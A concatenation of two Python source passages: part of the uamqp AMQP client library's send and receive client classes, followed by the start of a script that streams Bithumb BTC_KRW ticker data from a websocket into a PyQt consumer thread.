            _logger.debug("Closing non-CBS session.")
            self._session.destroy()
        else:
            # CBS sessions are owned by the auth layer; leave teardown to it.
            _logger.debug("CBS session pending.")
        self._session = None
        # Only destroy connections this client created itself.
        if not self._ext_connection:
            _logger.debug("Closing exclusive connection.")
            self._connection.destroy()
        else:
            _logger.debug("Shared connection remaining open.")
        self._connection = None
    def mgmt_request(self, message, operation, op_type=None, node=None, callback=None, **kwargs):
        """Run a request/response operation. These are frequently used for management
        tasks against a $management node, however any node name can be specified
        and the available options will depend on the target service.
        :param message: The message to send in the management request.
        :type message: ~uamqp.message.Message
        :param operation: The type of operation to be performed. This value will
         be service-specific, but common values include READ, CREATE and UPDATE.
         This value will be added as an application property on the message.
        :type operation: bytes
        :param op_type: The type on which to carry out the operation. This will
         be specific to the entities of the service. This value will be added as
         an application property on the message.
        :type op_type: bytes
        :param node: The target node. Default is `b"$management"`.
        :type node: bytes
        :param timeout: Provide an optional timeout in milliseconds within which a response
         to the management request must be received.
        :type timeout: float
        :param callback: The function to process the returned parameters of the management
         request including status code and a description if available. This can be used
         to reformat the response or raise an error based on content. The function must
         take 3 arguments - status code, response message and description.
        :type callback: ~callable[int, bytes, ~uamqp.message.Message]
        :param status_code_field: Provide an alternate name for the status code in the
         response body which can vary between services due to the spec still being in draft.
         The default is `b"statusCode"`.
        :type status_code_field: bytes
        :param description_fields: Provide an alternate name for the description in the
         response body which can vary between services due to the spec still being in draft.
         The default is `b"statusDescription"`.
        :type description_fields: bytes
        :rtype: ~uamqp.message.Message
        """
        # Block until CBS authentication has completed (poll in 50ms steps).
        while not self.auth_complete():
            time.sleep(0.05)
        response = self._session.mgmt_request(
            message,
            operation,
            op_type=op_type,
            node=node,
            callback=callback,
            encoding=self._encoding,
            debug=self._debug_trace,
            **kwargs)
        return response
    def auth_complete(self):
        """Whether the authentication handshake is complete during
        connection initialization.
        :rtype: bool
        """
        timeout = False
        auth_in_progress = False
        # Non-CBS auth has no token handshake, so it is trivially complete.
        if self._connection._cbs:  # pylint: disable=protected-access
            timeout, auth_in_progress = self._auth.handle_token()
            # (None, None) means the token handler made no progress this pass.
            if timeout is None and auth_in_progress is None:
                _logger.debug("No work done.")
                return False
        if timeout:
            raise compat.TimeoutException("Authorization timeout.")
        if auth_in_progress:
            # Pump the connection so the handshake can advance.
            self._connection.work()
            return False
        return True
    def client_ready(self):
        """
        Whether the handler has completed all start up processes such as
        establishing the connection, session, link and authentication, and
        is now ready to process messages.
        :rtype: bool
        """
        if not self.auth_complete():
            return False
        if not self._client_ready():
            # Links not up yet - pump the connection to make progress.
            self._connection.work()
            return False
        return True
def do_work(self):
"""Run a single connection iteration.
This will return `True` if the connection is still open
and ready to be used for further work, or `False` if it needs
to be shut down.
:rtype: bool
:raises: TimeoutError or ~uamqp.errors.ClientTimeout if CBS authentication timeout reached.
"""
if self._shutdown:
return False
if not self.client_ready():
return True
return self._client_run()
class SendClient(AMQPClient):
    """An AMQP client for sending messages.

    :param target: The target AMQP service endpoint. This can either be the URI as
     a string or a ~uamqp.address.Target object.
    :type target: str, bytes or ~uamqp.address.Target
    :param auth: Authentication for the connection. This should be one of the subclasses of
     uamqp.authentication.AMQPAuth. Currently this includes:
        - uamqp.authentication.SASLAnonymous
        - uamqp.authentication.SASLPlain
        - uamqp.authentication.SASTokenAuth
        - uamqp.authentication.JWTTokenAuth
     If no authentication is supplied, SASLAnonymous will be used by default.
    :type auth: ~uamqp.authentication.common.AMQPAuth
    :param client_name: The name for the client, also known as the Container ID.
     If no name is provided, a random GUID will be used.
    :type client_name: str or bytes
    :param debug: Whether to turn on network trace logs. If `True`, trace logs
     will be logged at INFO level. Default is `False`.
    :type debug: bool
    :param msg_timeout: A timeout in milliseconds for messages from when they have been
     added to the send queue to when the message is actually sent. This prevents potentially
     expired data from being sent. If set to 0, messages will not expire. Default is 0.
    :type msg_timeout: int
    :param error_policy: A policy for parsing errors on link, connection and message
     disposition to determine whether the error should be retryable.
    :type error_policy: ~uamqp.errors.ErrorPolicy
    :param keep_alive_interval: If set, a thread will be started to keep the connection
     alive during periods of user inactivity. The value will determine how long the
     thread will sleep (in seconds) between pinging the connection. If 0 or None, no
     thread will be started.
    :type keep_alive_interval: int
    :param send_settle_mode: The mode by which to settle message send
     operations. If set to `Unsettled`, the client will wait for a confirmation
     from the service that the message was successfully sent. If set to 'Settled',
     the client will not wait for confirmation and assume success.
    :type send_settle_mode: ~uamqp.constants.SenderSettleMode
    :param receive_settle_mode: The mode by which to settle message receive
     operations. If set to `PeekLock`, the receiver will lock a message once received until
     the client accepts or rejects the message. If set to `ReceiveAndDelete`, the service
     will assume successful receipt of the message and clear it from the queue. The
     default is `PeekLock`.
    :type receive_settle_mode: ~uamqp.constants.ReceiverSettleMode
    :param desired_capabilities: The extension capabilities desired from the peer endpoint.
     To create a desired_capabilities object, please do as follows:
        - 1. Create an array of desired capability symbols: `capabilities_symbol_array = [types.AMQPSymbol(string)]`
        - 2. Transform the array to AMQPValue object: `utils.data_factory(types.AMQPArray(capabilities_symbol_array))`
    :type desired_capabilities: ~uamqp.c_uamqp.AMQPValue
    :param max_message_size: The maximum allowed message size negotiated for the Link.
    :type max_message_size: int
    :param link_properties: Metadata to be sent in the Link ATTACH frame.
    :type link_properties: dict
    :param link_credit: The sender Link credit that determines how many
     messages the Link will attempt to handle per connection iteration.
    :type link_credit: int
    :param max_frame_size: Maximum AMQP frame size. Default is 63488 bytes.
    :type max_frame_size: int
    :param channel_max: Maximum number of Session channels in the Connection.
    :type channel_max: int
    :param idle_timeout: Timeout in milliseconds after which the Connection will close
     if there is no further activity.
    :type idle_timeout: int
    :param properties: Connection properties.
    :type properties: dict
    :param remote_idle_timeout_empty_frame_send_ratio: Ratio of empty frames to
     idle time for Connections with no activity. Value must be between
     0.0 and 1.0 inclusive. Default is 0.5.
    :type remote_idle_timeout_empty_frame_send_ratio: float
    :param incoming_window: The size of the allowed window for incoming messages.
    :type incoming_window: int
    :param outgoing_window: The size of the allowed window for outgoing messages.
    :type outgoing_window: int
    :param handle_max: The maximum number of concurrent link handles.
    :type handle_max: int
    :param on_attach: A callback function to be run on receipt of an ATTACH frame.
     The function must take 4 arguments: source, target, properties and error.
    :type on_attach: func[~uamqp.address.Source, ~uamqp.address.Target, dict, ~uamqp.errors.AMQPConnectionError]
    :param encoding: The encoding to use for parameters supplied as strings.
     Default is 'UTF-8'
    :type encoding: str
    """

    def __init__(
            self, target, auth=None, client_name=None, debug=False, msg_timeout=0,
            error_policy=None, keep_alive_interval=None, **kwargs):
        target = target if isinstance(target, address.Address) else address.Target(target)
        self._msg_timeout = msg_timeout
        self._pending_messages = []
        # Count of messages waiting for a send acknowledgement within the
        # current do_work iteration. This must be an int: _filter_pending()
        # increments it and _client_run() resets it to 0. (Previously it was
        # mis-initialized as a list, inconsistent with how it is used.)
        self._waiting_messages = 0
        self._shutdown = None
        # Sender and Link settings
        self._max_message_size = kwargs.pop('max_message_size', None) or constants.MAX_MESSAGE_LENGTH_BYTES
        self._link_properties = kwargs.pop('link_properties', None)
        self._link_credit = kwargs.pop('link_credit', None)
        # AMQP object settings
        self.sender_type = sender.MessageSender
        super(SendClient, self).__init__(
            target,
            auth=auth,
            client_name=client_name,
            debug=debug,
            error_policy=error_policy,
            keep_alive_interval=keep_alive_interval,
            **kwargs)

    def _client_ready(self):
        """Determine whether the client is ready to start sending messages.
        To be ready, the connection must be open and authentication complete,
        The Session, Link and MessageSender must be open and in non-errored
        states.

        :rtype: bool
        :raises: ~uamqp.errors.MessageHandlerError if the MessageSender
         goes into an error state.
        """
        # pylint: disable=protected-access
        if not self.message_handler:
            # Lazily create and open the sender link on first readiness check.
            self.message_handler = self.sender_type(
                self._session, self._name, self._remote_address,
                name='sender-link-{}'.format(uuid.uuid4()),
                debug=self._debug_trace,
                send_settle_mode=self._send_settle_mode,
                receive_settle_mode=self._receive_settle_mode,
                max_message_size=self._max_message_size,
                link_credit=self._link_credit,
                properties=self._link_properties,
                error_policy=self._error_policy,
                encoding=self._encoding,
                desired_capabilities=self._desired_capabilities)
            self.message_handler.open()
            return False
        if self.message_handler.get_state() == constants.MessageSenderState.Error:
            raise errors.MessageHandlerError(
                "Message Sender Client is in an error state. "
                "Please confirm credentials and access permissions."
                "\nSee debug trace for more details.")
        if self.message_handler.get_state() != constants.MessageSenderState.Open:
            return False
        return True

    def _on_message_sent(self, message, result, delivery_state=None):
        """Callback run on a message send operation. If message
        has a user defined callback, it will be called here. If the result
        of the operation is failure, the message state will be reverted
        to 'pending' up to the maximum retry count.

        :param message: The message that was sent.
        :type message: ~uamqp.message.Message
        :param result: The result of the send operation.
        :type result: int
        :param delivery_state: The disposition details of a failed send, or an
         Exception if an error occurred during the send operation.
        :type delivery_state: dict or Exception
        """
        # pylint: disable=protected-access
        try:
            exception = delivery_state
            result = constants.MessageSendResult(result)
            if result == constants.MessageSendResult.Error:
                # Normalize whatever failure detail we received into an exception
                # carrying a retry decision (ErrorAction).
                if isinstance(delivery_state, Exception):
                    exception = errors.ClientMessageError(delivery_state, info=delivery_state)
                    exception.action = errors.ErrorAction(retry=True)
                elif delivery_state:
                    error = errors.ErrorResponse(delivery_state)
                    exception = errors._process_send_error(
                        self._error_policy,
                        error.condition,
                        error.description,
                        error.info)
                else:
                    exception = errors.MessageSendFailed(constants.ErrorCodes.UnknownError)
                    exception.action = errors.ErrorAction(retry=True)

                if exception.action.retry == errors.ErrorAction.retry \
                        and message.retries < self._error_policy.max_retries:
                    if exception.action.increment_retries:
                        message.retries += 1
                    self._backoff = exception.action.backoff
                    _logger.debug("Message error, retrying. Attempts: %r, Error: %r", message.retries, exception)
                    # Revert to pending so the next _filter_pending() pass resends it.
                    message.state = constants.MessageState.WaitingToBeSent
                    return
                if exception.action.retry == errors.ErrorAction.retry:
                    _logger.info("Message error, %r retries exhausted. Error: %r", message.retries, exception)
                else:
                    _logger.info("Message error, not retrying. Error: %r", exception)
                message.state = constants.MessageState.SendFailed
                message._response = exception
            elif result == constants.MessageSendResult.Timeout:
                exception = compat.TimeoutException("Message send timed out.")
                _logger.info("Message error, not retrying. Error: %r", exception)
                message.state = constants.MessageState.SendFailed
                message._response = exception
            else:
                _logger.debug("Message sent: %r, %r", result, exception)
                message.state = constants.MessageState.SendComplete
                message._response = errors.MessageAlreadySettled()
            if message.on_send_complete:
                message.on_send_complete(result, exception)
        except KeyboardInterrupt:
            _logger.error("Received shutdown signal while processing message send completion.")
            self.message_handler._error = errors.AMQPClientShutdown()

    def _get_msg_timeout(self, message):
        """Return the remaining send timeout for *message* in milliseconds.

        Returns None if the message has already expired, 0 if no timeout is
        configured, otherwise the remaining time before expiry.
        """
        current_time = self._counter.get_current_ms()
        elapsed_time = (current_time - message.idle_time)
        if self._msg_timeout > 0 and elapsed_time > self._msg_timeout:
            return None
        return self._msg_timeout - elapsed_time if self._msg_timeout > 0 else 0

    def _transfer_message(self, message, timeout):
        """Hand a message to the MessageSender for transfer.

        :raises: RuntimeError if the sender could not queue the message data.
        """
        sent = self.message_handler.send(message, self._on_message_sent, timeout=timeout)
        if not sent:
            _logger.info("Message not sent, raising RuntimeError.")
            raise RuntimeError("Message sender failed to add message data to outgoing queue.")

    def _filter_pending(self):
        """Process the pending queue for one iteration: drop completed messages,
        transfer those waiting to be sent, and count those awaiting an ack.

        :rtype: list[~uamqp.message.Message]
        """
        filtered = []
        for message in self._pending_messages:
            if message.state in constants.DONE_STATES:
                continue
            elif message.state == constants.MessageState.WaitingForSendAck:
                self._waiting_messages += 1
            elif message.state == constants.MessageState.WaitingToBeSent:
                message.state = constants.MessageState.WaitingForSendAck
                try:
                    timeout = self._get_msg_timeout(message)
                    if timeout is None:
                        # Message expired before it could be sent.
                        self._on_message_sent(message, constants.MessageSendResult.Timeout)
                        if message.state != constants.MessageState.WaitingToBeSent:
                            continue
                    else:
                        self._transfer_message(message, timeout)
                except Exception as exp:  # pylint: disable=broad-except
                    self._on_message_sent(message, constants.MessageSendResult.Error, delivery_state=exp)
                    if message.state != constants.MessageState.WaitingToBeSent:
                        continue
            filtered.append(message)
        return filtered

    def _client_run(self):
        """MessageSender Link is now open - perform message send
        on all pending messages.
        Will return True if operation successful and client can remain open for
        further work.

        :rtype: bool
        """
        # pylint: disable=protected-access
        self.message_handler.work()
        self._connection.work()
        if self._connection._state == c_uamqp.ConnectionState.DISCARDING:
            raise errors.ConnectionClose(constants.ErrorCodes.InternalServerError)
        self._waiting_messages = 0
        self._pending_messages = self._filter_pending()
        # Only back off if nothing is currently awaiting an ack; otherwise
        # sleeping would delay processing of in-flight messages.
        if self._backoff and not self._waiting_messages:
            _logger.info("Client told to backoff - sleeping for %r seconds", self._backoff)
            self._connection.sleep(self._backoff)
            self._backoff = 0
        return True

    @property
    def _message_sender(self):
        """Temporary property to support backwards compatibility
        with EventHubs.
        """
        return self.message_handler

    @property
    def pending_messages(self):
        """Messages in the queue that have not yet reached a terminal state."""
        return [m for m in self._pending_messages if m.state in constants.PENDING_STATES]

    def redirect(self, redirect, auth):
        """Redirect the client endpoint using a Link DETACH redirect
        response.

        :param redirect: The Link DETACH redirect details.
        :type redirect: ~uamqp.errors.LinkRedirect
        :param auth: Authentication credentials to the redirected endpoint.
        :type auth: ~uamqp.authentication.common.AMQPAuth
        """
        if self._ext_connection:
            raise ValueError(
                "Clients with a shared connection cannot be "
                "automatically redirected.")
        if self.message_handler:
            self.message_handler.destroy()
            self.message_handler = None
        # Queued messages cannot survive the redirect - they are dropped.
        self._pending_messages = []
        self._remote_address = address.Target(redirect.address)
        self._redirect(redirect, auth)

    def queue_message(self, *messages):
        """Add one or more messages to the send queue.
        No further action will be taken until either `SendClient.wait()`
        or `SendClient.send_all_messages()` has been called.
        The client does not need to be open yet for messages to be added
        to the queue. Multiple messages can be queued at once:
            - `send_client.queue_message(my_message)`
            - `send_client.queue_message(message_1, message_2, message_3)`
            - `send_client.queue_message(*my_message_list)`

        :param messages: A message to send. This can either be a single instance
         of `Message`, or multiple messages wrapped in an instance of `BatchMessage`.
        :type messages: ~uamqp.message.Message
        """
        for message in messages:
            for internal_message in message.gather():
                internal_message.idle_time = self._counter.get_current_ms()
                internal_message.state = constants.MessageState.WaitingToBeSent
                self._pending_messages.append(internal_message)

    def send_message(self, messages, close_on_done=False):
        """Send a single message or batched message.

        :param messages: A message to send. This can either be a single instance
         of `Message`, or multiple messages wrapped in an instance of `BatchMessage`.
        :type messages: ~uamqp.message.Message
        :param close_on_done: Close the client once the message is sent. Default is `False`.
        :type close_on_done: bool
        :raises: ~uamqp.errors.MessageException if message fails to send after retry policy
         is exhausted.
        """
        batch = messages.gather()
        pending_batch = []
        for message in batch:
            message.idle_time = self._counter.get_current_ms()
            self._pending_messages.append(message)
            pending_batch.append(message)
        self.open()
        running = True
        try:
            # Keep working until every message in this batch reaches a
            # terminal state or the client shuts down.
            while running and any(m.state not in constants.DONE_STATES for m in pending_batch):
                running = self.do_work()
            failed = [m for m in pending_batch if m.state == constants.MessageState.SendFailed]
            if failed:
                details = {"total_messages": len(pending_batch), "number_failed": len(failed)}
                details['failed_messages'] = {}
                exception = None
                for failed_message in failed:
                    exception = failed_message._response  # pylint: disable=protected-access
                    details['failed_messages'][failed_message] = exception
                raise errors.ClientMessageError(exception, info=details)
        finally:
            if close_on_done or not running:
                self.close()

    def messages_pending(self):
        """Check whether the client is holding any unsent
        messages in the queue.

        :rtype: bool
        """
        return bool(self._pending_messages)

    def wait(self):
        """Run the client until all pending message in the queue
        have been processed. Returns whether the client is still running after the
        messages have been processed, or whether a shutdown has been initiated.

        :rtype: bool
        """
        running = True
        while running and self.messages_pending():
            running = self.do_work()
        return running

    def send_all_messages(self, close_on_done=True):
        """Send all pending messages in the queue. This will return a list
        of the send result of all the pending messages so it can be
        determined if any messages failed to send.
        This function will open the client if it is not already open.

        :param close_on_done: Close the client once the messages are sent.
         Default is `True`.
        :type close_on_done: bool
        :rtype: list[~uamqp.constants.MessageState]
        """
        self.open()
        running = True
        try:
            # Snapshot the queue before draining so results can be reported
            # even for messages removed from _pending_messages.
            messages = self._pending_messages[:]
            running = self.wait()
            results = [m.state for m in messages]
            return results
        finally:
            if close_on_done or not running:
                self.close()
class ReceiveClient(AMQPClient):
    """An AMQP client for receiving messages.

    :param source: The source AMQP service endpoint. This can either be the URI as
     a string or a ~uamqp.address.Source object.
    :type source: str, bytes or ~uamqp.address.Source
    :param auth: Authentication for the connection. This should be one of the subclasses of
     uamqp.authentication.AMQPAuth. Currently this includes:
        - uamqp.authentication.SASLAnonymous
        - uamqp.authentication.SASLPlain
        - uamqp.authentication.SASTokenAuth
        - uamqp.authentication.JWTTokenAuth
     If no authentication is supplied, SASLAnonymous will be used by default.
    :type auth: ~uamqp.authentication.common.AMQPAuth
    :param client_name: The name for the client, also known as the Container ID.
     If no name is provided, a random GUID will be used.
    :type client_name: str or bytes
    :param debug: Whether to turn on network trace logs. If `True`, trace logs
     will be logged at INFO level. Default is `False`.
    :type debug: bool
    :param timeout: A timeout in milliseconds. The receiver will shut down if no
     new messages are received after the specified timeout. If set to 0, the receiver
     will never timeout and will continue to listen. The default is 0.
     Set `shutdown_after_timeout` to `False` if keeping the receiver open after timeout is needed.
    :type timeout: float
    :param shutdown_after_timeout: Whether to automatically shutdown the receiver
     if no new messages are received after the specified timeout. Default is `True`.
    :type shutdown_after_timeout: bool
    :param auto_complete: Whether to automatically settle message received via callback
     or via iterator. If the message has not been explicitly settled after processing
     the message will be accepted. Alternatively, when used with batch receive, this setting
     will determine whether the messages are pre-emptively settled during batching, or otherwise
     let to the user to be explicitly settled.
    :type auto_complete: bool
    :param error_policy: A policy for parsing errors on link, connection and message
     disposition to determine whether the error should be retryable.
    :type error_policy: ~uamqp.errors.ErrorPolicy
    :param keep_alive_interval: If set, a thread will be started to keep the connection
     alive during periods of user inactivity. The value will determine how long the
     thread will sleep (in seconds) between pinging the connection. If 0 or None, no
     thread will be started.
    :type keep_alive_interval: int
    :param send_settle_mode: The mode by which to settle message send
     operations. If set to `Unsettled`, the client will wait for a confirmation
     from the service that the message was successfully sent. If set to 'Settled',
     the client will not wait for confirmation and assume success.
    :type send_settle_mode: ~uamqp.constants.SenderSettleMode
    :param receive_settle_mode: The mode by which to settle message receive
     operations. If set to `PeekLock`, the receiver will lock a message once received until
     the client accepts or rejects the message. If set to `ReceiveAndDelete`, the service
     will assume successful receipt of the message and clear it from the queue. The
     default is `PeekLock`.
    :type receive_settle_mode: ~uamqp.constants.ReceiverSettleMode
    :param desired_capabilities: The extension capabilities desired from the peer endpoint.
     To create a desired_capabilities object, please do as follows:
        - 1. Create an array of desired capability symbols: `capabilities_symbol_array = [types.AMQPSymbol(string)]`
        - 2. Transform the array to AMQPValue object: `utils.data_factory(types.AMQPArray(capabilities_symbol_array))`
    :type desired_capabilities: ~uamqp.c_uamqp.AMQPValue
    :param max_message_size: The maximum allowed message size negotiated for the Link.
    :type max_message_size: int
    :param link_properties: Metadata to be sent in the Link ATTACH frame.
    :type link_properties: dict
    :param prefetch: The receiver Link credit that determines how many
     messages the Link will attempt to handle per connection iteration.
     The default is 300.
    :type prefetch: int
    :param max_frame_size: Maximum AMQP frame size. Default is 63488 bytes.
    :type max_frame_size: int
    :param channel_max: Maximum number of Session channels in the Connection.
    :type channel_max: int
    :param idle_timeout: Timeout in milliseconds after which the Connection will close
     if there is no further activity.
    :type idle_timeout: int
    :param properties: Connection properties.
    :type properties: dict
    :param remote_idle_timeout_empty_frame_send_ratio: Ratio of empty frames to
     idle time for Connections with no activity. Value must be between
     0.0 and 1.0 inclusive. Default is 0.5.
    :type remote_idle_timeout_empty_frame_send_ratio: float
    :param incoming_window: The size of the allowed window for incoming messages.
    :type incoming_window: int
    :param outgoing_window: The size of the allowed window for outgoing messages.
    :type outgoing_window: int
    :param handle_max: The maximum number of concurrent link handles.
    :type handle_max: int
    :param on_attach: A callback function to be run on receipt of an ATTACH frame.
     The function must take 4 arguments: source, target, properties and error.
    :type on_attach: func[~uamqp.address.Source, ~uamqp.address.Target, dict, ~uamqp.errors.AMQPConnectionError]
    :param encoding: The encoding to use for parameters supplied as strings.
     Default is 'UTF-8'
    :type encoding: str
    """

    def __init__(
            self, source, auth=None, client_name=None, debug=False, timeout=0,
            auto_complete=True, error_policy=None, **kwargs):
        source = source if isinstance(source, address.Address) else address.Source(source)
        self._timeout = timeout
        # Timestamp of the last received message, used to detect idle timeout.
        self._last_activity_timestamp = None
        self._was_message_received = False
        self._message_received_callback = None
        # True while receive_messages() is streaming via callback only
        # (messages are then not added to the internal queue).
        self._streaming_receive = False
        self._received_messages = compat.queue.Queue()
        self._shutdown_after_timeout = kwargs.pop('shutdown_after_timeout', True)
        self._timeout_reached = False
        # Receiver and Link settings
        self._max_message_size = kwargs.pop('max_message_size', None) or constants.MAX_MESSAGE_LENGTH_BYTES
        self._prefetch = kwargs.pop('prefetch', None) or 300
        self._link_properties = kwargs.pop('link_properties', None)
        # AMQP object settings
        self.receiver_type = receiver.MessageReceiver
        self.auto_complete = auto_complete
        super(ReceiveClient, self).__init__(
            source, auth=auth, client_name=client_name, error_policy=error_policy, debug=debug, **kwargs)

    @property
    def _message_receiver(self):
        """Temporary property to support backwards compatibility
        with EventHubs.
        """
        return self.message_handler

    def _client_ready(self):
        """Determine whether the client is ready to start receiving messages.
        To be ready, the connection must be open and authentication complete,
        The Session, Link and MessageReceiver must be open and in non-errored
        states.

        :rtype: bool
        :raises: ~uamqp.errors.MessageHandlerError if the MessageReceiver
         goes into an error state.
        """
        # pylint: disable=protected-access
        if not self.message_handler:
            # Lazily create and open the receiver link on first readiness check.
            self.message_handler = self.receiver_type(
                self._session, self._remote_address, self._name,
                on_message_received=self._message_received,
                name='receiver-link-{}'.format(uuid.uuid4()),
                debug=self._debug_trace,
                receive_settle_mode=self._receive_settle_mode,
                send_settle_mode=self._send_settle_mode,
                prefetch=0,  # set to 0 as not to receive messages during connection establishment, set prefetch later
                max_message_size=self._max_message_size,
                properties=self._link_properties,
                error_policy=self._error_policy,
                encoding=self._encoding,
                desired_capabilities=self._desired_capabilities)
            self.message_handler.open()
            return False
        if self.message_handler.get_state() == constants.MessageReceiverState.Error:
            raise errors.MessageHandlerError(
                "Message Receiver Client is in an error state. "
                "Please confirm credentials and access permissions."
                "\nSee debug trace for more details.")
        if self.message_handler.get_state() != constants.MessageReceiverState.Open:
            self._last_activity_timestamp = self._counter.get_current_ms()
            return False
        # once the receiver client is ready/connection established, we set prefetch as per the config
        self.message_handler._link.set_prefetch_count(self._prefetch)  # pylint: disable=protected-access
        return True

    def _client_run(self):
        """MessageReceiver Link is now open - start receiving messages.
        Will return True if operation successful and client can remain open for
        further work.

        :rtype: bool
        """
        self.message_handler.work()
        self._connection.work()
        now = self._counter.get_current_ms()
        if self._last_activity_timestamp and not self._was_message_received:
            # If no messages are coming through, back off a little to keep CPU use low.
            time.sleep(0.05)
            if self._timeout > 0:
                timespan = now - self._last_activity_timestamp
                if timespan >= self._timeout:
                    self._timeout_reached = True
                    if self._shutdown_after_timeout:
                        _logger.info("Timeout reached, closing receiver.")
                        self._shutdown = True
                    else:
                        self._last_activity_timestamp = None  # To reuse the receiver, reset the timestamp
                        _logger.info("Timeout reached, keeping receiver open.")
        else:
            self._last_activity_timestamp = now
        self._was_message_received = False
        return True

    def _complete_message(self, message, auto):  # pylint: disable=no-self-use
        """Accept *message* if auto-complete is enabled and it exists."""
        if not message or not auto:
            return
        message.accept()

    def _message_generator(self):
        """Iterate over processed messages in the receive queue.

        :rtype: generator[~uamqp.message.Message]
        """
        self.open()
        # Disable auto-complete during iteration: each message is settled
        # only after the consumer has had a chance to process it (post-yield).
        auto_complete = self.auto_complete
        self.auto_complete = False
        self._timeout_reached = False
        self._last_activity_timestamp = None
        receiving = True
        message = None
        try:
            while receiving and not self._timeout_reached:
                while receiving and self._received_messages.empty() and not self._timeout_reached:
                    receiving = self.do_work()
                while not self._received_messages.empty():
                    message = self._received_messages.get()
                    self._received_messages.task_done()
                    yield message
                    # Settle the message the consumer just finished with.
                    self._complete_message(message, auto_complete)
        finally:
            self._complete_message(message, auto_complete)
            self.auto_complete = auto_complete
            if self._shutdown_after_timeout:
                self.close()

    def _message_received(self, message):
        """Callback run on receipt of every message. If there is
        a user-defined callback, this will be called.
        Additionally if the client is retrieving messages for a batch
        or iterator, the message will be added to an internal queue.

        :param message: Received message.
        :type message: ~uamqp.message.Message
        """
        self._was_message_received = True
        if self._message_received_callback:
            self._message_received_callback(message)
            self._complete_message(message, self.auto_complete)
        if not self._streaming_receive:
            self._received_messages.put(message)
        elif not message.settled:
            # Message was received with callback processing and wasn't settled.
            _logger.info("Message was not settled.")

    def receive_message_batch(self, max_batch_size=None, on_message_received=None, timeout=0):
        """Receive a batch of messages. Messages returned in the batch have already been
        accepted - if you wish to add logic to accept or reject messages based on custom
        criteria, pass in a callback. This method will return as soon as some messages are
        available rather than waiting to achieve a specific batch size, and therefore the
        number of messages returned per call will vary up to the maximum allowed.

        If the receive client is configured with `auto_complete=True` then the messages received
        in the batch returned by this function will already be settled. Alternatively, if
        `auto_complete=False`, then each message will need to be explicitly settled before
        it expires and is released.

        :param max_batch_size: The maximum number of messages that can be returned in
         one call. This value cannot be larger than the prefetch value, and if not specified,
         the prefetch value will be used.
        :type max_batch_size: int
        :param on_message_received: A callback to process messages as they arrive from the
         service. It takes a single argument, a ~uamqp.message.Message object.
        :type on_message_received: callable[~uamqp.message.Message]
        :param timeout: A timeout in milliseconds for which to wait to receive any messages.
         If no messages are received in this time, an empty list will be returned. If set to
         0, the client will continue to wait until at least one message is received. The
         default is 0.
        :type timeout: float
        """
        self._message_received_callback = on_message_received
        max_batch_size = max_batch_size or self._prefetch
        if max_batch_size > self._prefetch:
            raise ValueError(
                'Maximum batch size cannot be greater than the '
                'connection link credit: {}'.format(self._prefetch))
        # Convert relative timeout to an absolute deadline (0 = no deadline).
        timeout = self._counter.get_current_ms() + timeout if timeout else 0
        expired = False
        self.open()
        receiving = True
        batch = []
        # First drain anything already buffered from a previous iteration.
        while not self._received_messages.empty() and len(batch) < max_batch_size:
            batch.append(self._received_messages.get())
            self._received_messages.task_done()
        if len(batch) >= max_batch_size:
            return batch
        self._timeout_reached = False
        self._last_activity_timestamp = None
        while receiving and not expired and len(batch) < max_batch_size and not self._timeout_reached:
            while receiving and self._received_messages.qsize() < max_batch_size and not self._timeout_reached:
                if timeout and self._counter.get_current_ms() > timeout:
                    expired = True
                    break
                before = self._received_messages.qsize()
                receiving = self.do_work()
                received = self._received_messages.qsize() - before
                if self._received_messages.qsize() > 0 and received == 0:
                    # No new messages arrived, but we have some - so return what we have.
                    expired = True
                    break
            while not self._received_messages.empty() and len(batch) < max_batch_size:
                batch.append(self._received_messages.get())
                self._received_messages.task_done()
        return batch

    def receive_messages(self, on_message_received):
        """Receive messages. This function will run indefinitely, until the client
        closes either via timeout, error or forced interruption (e.g. keyboard interrupt).

        If the receive client is configured with `auto_complete=True` then the messages that
        have not been settled on completion of the provided callback will automatically be
        accepted provided it has not expired. If an error occurs or the message has expired
        it will be released. Alternatively if `auto_complete=False`, each message will need
        to be explicitly settled during the callback, otherwise it will be released.

        :param on_message_received: A callback to process messages as they arrive from the
         service. It takes a single argument, a ~uamqp.message.Message object.
        :type on_message_received: callable[~uamqp.message.Message]
        """
        self._streaming_receive = True
        self.open()
        self._message_received_callback = on_message_received
        self._timeout_reached = False
        self._last_activity_timestamp = None
        receiving = True
        try:
            while receiving and not self._timeout_reached:
                receiving = self.do_work()
            receiving = False
        except:
            receiving = False
            raise
        finally:
            self._streaming_receive = False
            if not receiving and self._shutdown_after_timeout:
                self.close()

    def receive_messages_iter(self, on_message_received=None):
        """Receive messages by generator. Messages returned in the generator have already been
        accepted - if you wish to add logic to accept or reject messages based on custom
        criteria, pass in a callback.

        :param on_message_received: A callback to process messages as they arrive from the
         service. It takes a single argument, a ~uamqp.message.Message object.
        :type on_message_received: callable[~uamqp.message.Message]
        """
        self._message_received_callback = on_message_received
        return self._message_generator()

    def redirect(self, redirect, auth):
        """Redirect the client endpoint using a Link DETACH redirect
        response.

        :param redirect: The Link DETACH redirect details.
        :type redirect: ~uamqp.errors.LinkRedirect
        :param auth: Authentication credentials to the redirected endpoint.
        :type auth: ~uamqp.authentication.common.AMQPAuth
        """
        if self._ext_connection:
            raise ValueError(
                "Clients with a shared connection cannot be "
                "automatically redirected.")
        if self.message_handler:
            self.message_handler.destroy()
            self.message_handler = None
        # Reset receive state; any buffered messages are discarded.
        self._shutdown = False
        self._last_activity_timestamp = None
        self._was_message_received = False
        self._received_messages = compat.queue.Queue()
        self._remote_address = address.Source(redirect.address)
        self._redirect(redirect, auth)
|
09_10.py | import multiprocessing as mp
import websockets
import asyncio
import json
import sys
import datetime
from PyQt5.QtWidgets import *
from PyQt5.QtCore import *
async def bithumb_ws_client(q):
    """Subscribe to the Bithumb public websocket and push each ticker payload onto *q*."""
    uri = "wss://pubwss.bithumb.com/pub/ws"
    async with websockets.connect(uri, ping_interval=None) as websocket:
        # Ask for 1-hour BTC/KRW ticker updates.
        request = json.dumps({
            "type": "ticker",
            "symbols": ["BTC_KRW"],
            "tickTypes": ["1H"],
        })
        await websocket.send(request)
        while True:
            # Decode each frame and hand it to the consumer via the queue.
            q.put(json.loads(await websocket.recv()))
async def main(q):
    """Top-level coroutine: run the websocket client until the process exits."""
    return await bithumb_ws_client(q)
def producer(q):
    """Process entry point: drive the asyncio event loop for the websocket client."""
    asyncio.run(main(q))
class Consumer(QThread):
    """Worker thread that pops ticker data off the shared queue and re-emits it
    as a Qt signal, so the GUI thread can update widgets safely.
    """
    # Emitted with each decoded websocket payload (dict).
    poped = pyqtSignal(dict)

